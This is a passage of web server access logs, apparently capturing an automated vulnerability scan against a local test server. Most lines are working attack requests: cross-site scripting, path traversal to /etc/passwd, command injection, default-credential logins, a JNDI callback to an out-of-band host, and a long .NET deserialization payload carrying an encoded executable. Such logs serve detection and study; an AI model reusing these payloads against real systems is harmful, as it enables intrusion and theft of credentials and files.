Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/297MFkWoGJaW0XwBcpUFbiG9whJ/)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/apps/new-application HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"{\x0D\x0A \x22token\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/newpassword HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MFgDkAu3wlv221cYIgmnrQdR HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios3/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"username=admin&password={{admin}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.xbean.propertyeditor.JndiConverter\x22,\x0D\x0A \x22AsText\x22:\x22rmi://c9v8gc8smpv8b0ng0t00e7msofgf3m3ty.oast.online/exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /equipbid/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"success=%2Fshare%2Fpage%2F&failure=:\x5C\x5Cexample.com&username=baduser&password=badpass\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /share/page/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MFhkl9F4SSRyQmIE3NTtLMbO')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hedwig.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"notdelay=true&command=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cli.php?a=shell HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM